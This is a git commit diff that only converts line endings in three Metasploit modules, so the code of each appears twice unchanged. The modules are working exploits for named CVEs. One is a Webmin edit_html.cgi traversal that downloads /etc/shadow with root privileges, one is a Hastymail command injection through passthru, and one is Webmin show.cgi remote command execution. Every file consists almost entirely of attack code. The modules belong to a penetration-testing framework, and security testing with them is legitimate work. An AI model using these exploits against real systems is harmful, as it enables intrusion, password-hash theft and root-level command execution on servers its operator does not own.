Unix linefeeds, not windows

That's what I get for just committing willy-nilly with a fresh install
of Gvim for Windows.

Also, this is an experiment to see if linefeeds are being respected in
this editor window. I doubt they will be, given GitHub's resistance to
50/72 as a sensible default.
unstable
Tod Beardsley 2012-09-16 18:10:35 -05:00
parent 2fc34e0073
commit c83b49ad58
3 changed files with 420 additions and 420 deletions


@ -1,111 +1,111 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access',
'Description' => %q{
This module exploits a directory traversal in Webmin 1.580. The vulnerability
exists in the edit_html.cgi component and allows an authenticated user with access
to the File Manager Module to access arbitrary files with root privileges. The
module has been tested successfully with Webim 1.580 over Ubuntu 10.04.
},
'Author' => [
'Unknown', # From American Information Security Group
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['OSVDB', '85247'],
['BID', '55446'],
['CVE', '2012-2983'],
['URL', 'http://www.americaninfosec.com/research/dossiers/AISG-12-002.pdf'],
['URL', 'https://github.com/webmin/webmin/commit/4cd7bad70e23e4e19be8ccf7b9f245445b2b3b80']
],
'DisclosureDate' => 'Sep 06 2012',
'Actions' =>
[
['Download']
],
'DefaultAction' => 'Download'
))
register_options(
[
Opt::RPORT(10000),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('USERNAME', [true, 'Webmin Username']),
OptString.new('PASSWORD', [true, 'Webmin Password']),
OptInt.new('DEPTH', [true, 'Traversal depth', 4]),
OptString.new('RPATH', [ true, "The file to download", "/etc/shadow" ])
], self.class)
end
def run
peer = "#{rhost}:#{rport}"
print_status("#{peer} - Attempting to login...")
data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}"
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/session_login.cgi",
'cookie' => "testing=1",
'data' => data
}, 25)
if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/
session = res.headers['Set-Cookie'].scan(/sid\=(\w+)\;*/).flatten[0] || ''
if session and not session.empty?
print_good "#{peer} - Authentication successful"
else
print_error "#{peer} - Authentication failed"
return
end
else
print_error "#{peer} - Authentication failed"
return
end
print_status("#{peer} - Attempting to retrieve #{datastore['RPATH']}...")
traversal = "../" * datastore['DEPTH']
traversal << datastore['RPATH']
data = "file=#{traversal}&text=1"
res = send_request_cgi(
{
'method' => 'GET',
'uri' => "/file/edit_html.cgi?#{data}",
'cookie' => "sid=#{session}"
}, 25)
if (res and res.code == 200 and res.body =~ /#{traversal}/ and res.body =~ /name=body>(.*)<\/textarea>/m)
loot = $1
f = ::File.basename(datastore['RPATH'])
path = store_loot('webmin.file', 'application/octet-stream', rhost, loot, f, datastore['RPATH'])
print_status("#{peer} - #{datastore['RPATH']} saved in #{path}")
else
print_error("#{peer} - Failed to retrieve the file")
return
end
end
end
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access',
'Description' => %q{
This module exploits a directory traversal in Webmin 1.580. The vulnerability
exists in the edit_html.cgi component and allows an authenticated user with access
to the File Manager Module to access arbitrary files with root privileges. The
module has been tested successfully with Webim 1.580 over Ubuntu 10.04.
},
'Author' => [
'Unknown', # From American Information Security Group
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['OSVDB', '85247'],
['BID', '55446'],
['CVE', '2012-2983'],
['URL', 'http://www.americaninfosec.com/research/dossiers/AISG-12-002.pdf'],
['URL', 'https://github.com/webmin/webmin/commit/4cd7bad70e23e4e19be8ccf7b9f245445b2b3b80']
],
'DisclosureDate' => 'Sep 06 2012',
'Actions' =>
[
['Download']
],
'DefaultAction' => 'Download'
))
register_options(
[
Opt::RPORT(10000),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('USERNAME', [true, 'Webmin Username']),
OptString.new('PASSWORD', [true, 'Webmin Password']),
OptInt.new('DEPTH', [true, 'Traversal depth', 4]),
OptString.new('RPATH', [ true, "The file to download", "/etc/shadow" ])
], self.class)
end
def run
peer = "#{rhost}:#{rport}"
print_status("#{peer} - Attempting to login...")
data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}"
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/session_login.cgi",
'cookie' => "testing=1",
'data' => data
}, 25)
if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/
session = res.headers['Set-Cookie'].scan(/sid\=(\w+)\;*/).flatten[0] || ''
if session and not session.empty?
print_good "#{peer} - Authentication successful"
else
print_error "#{peer} - Authentication failed"
return
end
else
print_error "#{peer} - Authentication failed"
return
end
print_status("#{peer} - Attempting to retrieve #{datastore['RPATH']}...")
traversal = "../" * datastore['DEPTH']
traversal << datastore['RPATH']
data = "file=#{traversal}&text=1"
res = send_request_cgi(
{
'method' => 'GET',
'uri' => "/file/edit_html.cgi?#{data}",
'cookie' => "sid=#{session}"
}, 25)
if (res and res.code == 200 and res.body =~ /#{traversal}/ and res.body =~ /name=body>(.*)<\/textarea>/m)
loot = $1
f = ::File.basename(datastore['RPATH'])
path = store_loot('webmin.file', 'application/octet-stream', rhost, loot, f, datastore['RPATH'])
print_status("#{peer} - #{datastore['RPATH']} saved in #{path}")
else
print_error("#{peer} - Failed to retrieve the file")
return
end
end
end


@ -1,152 +1,152 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Hastymail 2.1.1 RC1 Command Injection",
'Description' => %q{
This module exploits a command injection vulnerability found in Hastymail
2.1.1 RC1 due to the insecure usage of the call_user_func_array() function on
the "lib/ajax_functions.php" script. Authentication is required on Hastymail
in order to exploit the vulnerability. The module has been successfully tested
on Hastymail 2.1.1 RC1 over Ubuntu 10.04.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Bruno Teixeira', # Vulnerability Discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2011-4542' ],
[ 'BID', '50791' ],
[ 'OSVDB', '77331' ],
[ 'URL', 'https://www.dognaedis.com/vulns/DGS-SEC-3.html' ]
],
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby netcat-e',
}
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['Hastymail 2.1.1 RC1', {}]
],
'Privileged' => false,
'DisclosureDate' => "Nov 22 2011",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, "The base path to Hastymail", "/hastymail2/"]),
OptString.new('USER', [true, "The username to authenticate with", ""]),
OptString.new('PASS', [true, "The password to authenticate with", ""])
], self.class)
end
def check
@uri = target_uri.path
@uri << '/' if @uri[-1,1] != '/'
@session_id = ""
@peer = "#{rhost}:#{rport}"
login
if not @session_id or @session_id.empty?
print_error "#{@peer} - Authentication failed"
return Exploit::CheckCode::Unknown
end
test = rand_text_alpha(rand(4) + 4)
data = "rs=passthru&"
data << "rsargs[]=#{rand_text_alpha(rand(4) + 4)}&"
data << "rsargs[]=echo #{test}"
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{@uri}",
'Cookie' => @session_id,
'data' => data
})
if res and res.code == 200 and res.body =~ /#{test}/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
def login
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{@uri}?page=login",
'vars_post' =>
{
'user' => datastore['USER'],
'pass' => datastore['PASS'],
'login' => 'Login'
}
})
if res and res.code == 303
@session_id = res["Set-Cookie"]
print_good "#{@peer} - Authentication successful"
end
end
def exploit
@uri = target_uri.path
@uri << '/' if @uri[-1,1] != '/'
@session_id = ""
@peer = "#{rhost}:#{rport}"
print_status "#{@peer} - Trying login"
login
if not @session_id or @session_id.empty?
print_error "#{@peer} - Authentication failed"
return
end
print_status "#{@peer} - Authentication successfully, trying to exploit"
data = "rs=passthru&"
data << "rsargs[]=#{rand_text_alpha(rand(4) + 4)}&"
data << "rsargs[]=#{payload.encoded}"
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{@uri}",
'Cookie' => @session_id,
'headers' => {
'Cmd' => Rex::Text.encode_base64(payload.encoded)
},
'data' => data
})
if not res or res.code != 200 or not res.body =~ /\+/
print_error "#{@peer} - Exploitation failed"
return
end
end
end
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Hastymail 2.1.1 RC1 Command Injection",
'Description' => %q{
This module exploits a command injection vulnerability found in Hastymail
2.1.1 RC1 due to the insecure usage of the call_user_func_array() function on
the "lib/ajax_functions.php" script. Authentication is required on Hastymail
in order to exploit the vulnerability. The module has been successfully tested
on Hastymail 2.1.1 RC1 over Ubuntu 10.04.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Bruno Teixeira', # Vulnerability Discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2011-4542' ],
[ 'BID', '50791' ],
[ 'OSVDB', '77331' ],
[ 'URL', 'https://www.dognaedis.com/vulns/DGS-SEC-3.html' ]
],
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby netcat-e',
}
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['Hastymail 2.1.1 RC1', {}]
],
'Privileged' => false,
'DisclosureDate' => "Nov 22 2011",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, "The base path to Hastymail", "/hastymail2/"]),
OptString.new('USER', [true, "The username to authenticate with", ""]),
OptString.new('PASS', [true, "The password to authenticate with", ""])
], self.class)
end
def check
@uri = target_uri.path
@uri << '/' if @uri[-1,1] != '/'
@session_id = ""
@peer = "#{rhost}:#{rport}"
login
if not @session_id or @session_id.empty?
print_error "#{@peer} - Authentication failed"
return Exploit::CheckCode::Unknown
end
test = rand_text_alpha(rand(4) + 4)
data = "rs=passthru&"
data << "rsargs[]=#{rand_text_alpha(rand(4) + 4)}&"
data << "rsargs[]=echo #{test}"
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{@uri}",
'Cookie' => @session_id,
'data' => data
})
if res and res.code == 200 and res.body =~ /#{test}/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
def login
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{@uri}?page=login",
'vars_post' =>
{
'user' => datastore['USER'],
'pass' => datastore['PASS'],
'login' => 'Login'
}
})
if res and res.code == 303
@session_id = res["Set-Cookie"]
print_good "#{@peer} - Authentication successful"
end
end
def exploit
@uri = target_uri.path
@uri << '/' if @uri[-1,1] != '/'
@session_id = ""
@peer = "#{rhost}:#{rport}"
print_status "#{@peer} - Trying login"
login
if not @session_id or @session_id.empty?
print_error "#{@peer} - Authentication failed"
return
end
print_status "#{@peer} - Authentication successfully, trying to exploit"
data = "rs=passthru&"
data << "rsargs[]=#{rand_text_alpha(rand(4) + 4)}&"
data << "rsargs[]=#{payload.encoded}"
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{@uri}",
'Cookie' => @session_id,
'headers' => {
'Cmd' => Rex::Text.encode_base64(payload.encoded)
},
'data' => data
})
if not res or res.code != 200 or not res.body =~ /\+/
print_error "#{@peer} - Exploitation failed"
return
end
end
end


@ -1,157 +1,157 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Webmin /file/show.cgi Remote Command Execution',
'Description' => %q{
This module exploits an arbitrary command execution vulnerability in Webmin
1.580. The vulnerability exists in the /file/show.cgi component and allows an
authenticated user, with access to the File Manager Module, to execute arbitrary
commands with root privileges. The module has been tested successfully with Webim
1.580 over Ubuntu 10.04.
},
'Author' => [
'Unknown', # From American Information Security Group
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['OSVDB', '85248'],
['BID', '55446'],
['CVE', '2012-2982'],
['URL', 'http://www.americaninfosec.com/research/dossiers/AISG-12-001.pdf'],
['URL', 'https://github.com/webmin/webmin/commit/1f1411fe7404ec3ac03e803cfa7e01515e71a213']
],
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl bash telnet',
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Webim 1.580', { }]],
'DisclosureDate' => 'Sep 06 2012',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(10000),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('USERNAME', [true, 'Webmin Username']),
OptString.new('PASSWORD', [true, 'Webmin Password'])
], self.class)
end
def check
peer = "#{rhost}:#{rport}"
print_status("#{peer} - Attempting to login...")
data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}"
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/session_login.cgi",
'cookie' => "testing=1",
'data' => data
}, 25)
if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/
print_good "#{peer} - Authentication successful"
session = res.headers['Set-Cookie'].split("sid=")[1].split(";")[0]
else
print_error "#{peer} - Authentication failed"
return Exploit::CheckCode::Unknown
end
print_status("#{peer} - Attempting to execute...")
command = "echo #{rand_text_alphanumeric(rand(5) + 5)}"
res = send_request_cgi(
{
'uri' => "/file/show.cgi/bin/#{rand_text_alphanumeric(5)}|#{command}|",
'cookie' => "sid=#{session}"
}, 25)
if res and res.code == 200 and res.message =~ /Document follows/
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end
def exploit
peer = "#{rhost}:#{rport}"
print_status("#{peer} - Attempting to login...")
data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}"
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/session_login.cgi",
'cookie' => "testing=1",
'data' => data
}, 25)
if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/
session = res.headers['Set-Cookie'].scan(/sid\=(\w+)\;*/).flatten[0] || ''
if session and not session.empty?
print_good "#{peer} - Authentication successfully"
else
print_error "#{peer} - Authentication failed"
return
end
print_good "#{peer} - Authentication successfully"
else
print_error "#{peer} - Authentication failed"
return
end
print_status("#{peer} - Attempting to execute the payload...")
command = payload.encoded
res = send_request_cgi(
{
'uri' => "/file/show.cgi/bin/#{rand_text_alphanumeric(rand(5) + 5)}|#{command}|",
'cookie' => "sid=#{session}"
}, 25)
if res and res.code == 200 and res.message =~ /Document follows/
print_good "#{peer} - Payload executed successfully"
else
print_error "#{peer} - Error executing the payload"
return
end
end
end
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Webmin /file/show.cgi Remote Command Execution',
'Description' => %q{
This module exploits an arbitrary command execution vulnerability in Webmin
1.580. The vulnerability exists in the /file/show.cgi component and allows an
authenticated user, with access to the File Manager Module, to execute arbitrary
commands with root privileges. The module has been tested successfully with Webim
1.580 over Ubuntu 10.04.
},
'Author' => [
'Unknown', # From American Information Security Group
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['OSVDB', '85248'],
['BID', '55446'],
['CVE', '2012-2982'],
['URL', 'http://www.americaninfosec.com/research/dossiers/AISG-12-001.pdf'],
['URL', 'https://github.com/webmin/webmin/commit/1f1411fe7404ec3ac03e803cfa7e01515e71a213']
],
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl bash telnet',
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Webim 1.580', { }]],
'DisclosureDate' => 'Sep 06 2012',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(10000),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('USERNAME', [true, 'Webmin Username']),
OptString.new('PASSWORD', [true, 'Webmin Password'])
], self.class)
end
def check
peer = "#{rhost}:#{rport}"
print_status("#{peer} - Attempting to login...")
data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}"
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/session_login.cgi",
'cookie' => "testing=1",
'data' => data
}, 25)
if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/
print_good "#{peer} - Authentication successful"
session = res.headers['Set-Cookie'].split("sid=")[1].split(";")[0]
else
print_error "#{peer} - Authentication failed"
return Exploit::CheckCode::Unknown
end
print_status("#{peer} - Attempting to execute...")
command = "echo #{rand_text_alphanumeric(rand(5) + 5)}"
res = send_request_cgi(
{
'uri' => "/file/show.cgi/bin/#{rand_text_alphanumeric(5)}|#{command}|",
'cookie' => "sid=#{session}"
}, 25)
if res and res.code == 200 and res.message =~ /Document follows/
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end
def exploit
peer = "#{rhost}:#{rport}"
print_status("#{peer} - Attempting to login...")
data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}"
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/session_login.cgi",
'cookie' => "testing=1",
'data' => data
}, 25)
if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/
session = res.headers['Set-Cookie'].scan(/sid\=(\w+)\;*/).flatten[0] || ''
if session and not session.empty?
print_good "#{peer} - Authentication successfully"
else
print_error "#{peer} - Authentication failed"
return
end
print_good "#{peer} - Authentication successfully"
else
print_error "#{peer} - Authentication failed"
return
end
print_status("#{peer} - Attempting to execute the payload...")
command = payload.encoded
res = send_request_cgi(
{
'uri' => "/file/show.cgi/bin/#{rand_text_alphanumeric(rand(5) + 5)}|#{command}|",
'cookie' => "sid=#{session}"
}, 25)
if res and res.code == 200 and res.message =~ /Document follows/
print_good "#{peer} - Payload executed successfully"
else
print_error "#{peer} - Error executing the payload"
return
end
end
end